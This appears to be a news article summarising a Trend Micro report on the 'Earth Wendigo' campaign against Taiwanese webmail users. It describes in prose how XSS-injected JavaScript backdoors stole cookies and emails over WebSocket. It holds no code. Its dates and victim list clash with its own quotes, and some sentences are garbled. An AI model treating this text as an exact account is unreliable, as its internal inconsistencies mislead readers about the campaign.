As per the cybersecurity experts, the cyberattacks are related
to Earth Wendigo, a cyber criminal currently not linked to any of
the hacking groups. At the start of May 2019, Trend Micro reported
that multiple organizations were attacked by Earth Wendigo. The
targets include research institutions, government organizations and
universities. The cyberattack used spear-phishing mails to exploit
its victims, which include activists and politicians based in Hong
Kong, Tibet and Uyghur region.
Trend Micro reports, "we discovered a new campaign that has been
targeting several organizations — including government
organizations, research institutions and universities in Taiwan —
since May 2019, aiming to exfiltrate emails from targeted
organizations via the injection of JavaScript backdoors to a
webmail system that is widely-used in Taiwan. With no clear
connection to any previous attack group, we gave this new threat
actor the name “Earth Wendigo.”
Earth Wendigo deployed spear-phishing emails that contained
obfuscate Java script code, using initial attack vectors, Java
script loaded corrupted scripts from remote servers controlled by
attackers. The scripts were built for stealing Webmail session keys
and browser cookies, spread the malicious scripts through appending
code with the target's email signature, and exploiting an XSS
(cross-site scripting) vulnerability in the Javascript injection
Webmail server. "The Earth Wendigo threat actor will establish a
WebSocket connection between the victims and their WebSocket server
via a JavaScript backdoor. The WebSocket server instructs the
backdoor on the victim’s browser to read emails from the webmail
server and then send the content and attachments of the emails back
to the WebSocket servers," says Trend Micro.
The XSS vulnerability exploit exists in system shortcut feature
of webmail, which allows the threat actor to put craft payload
shortcut that replaces webmail system page's parts by corrupted
JavaScript codes. "Additional investigation shows that the threat
actor also sent spear-phishing emails embedded with malicious links
to multiple individuals, including politicians and activists, who
support movements in Tibet, the Uyghur region, or Hong Kong.
However, this is a separate series of attacks from their operation
in Taiwan, which this report covers," reports Trend Micro.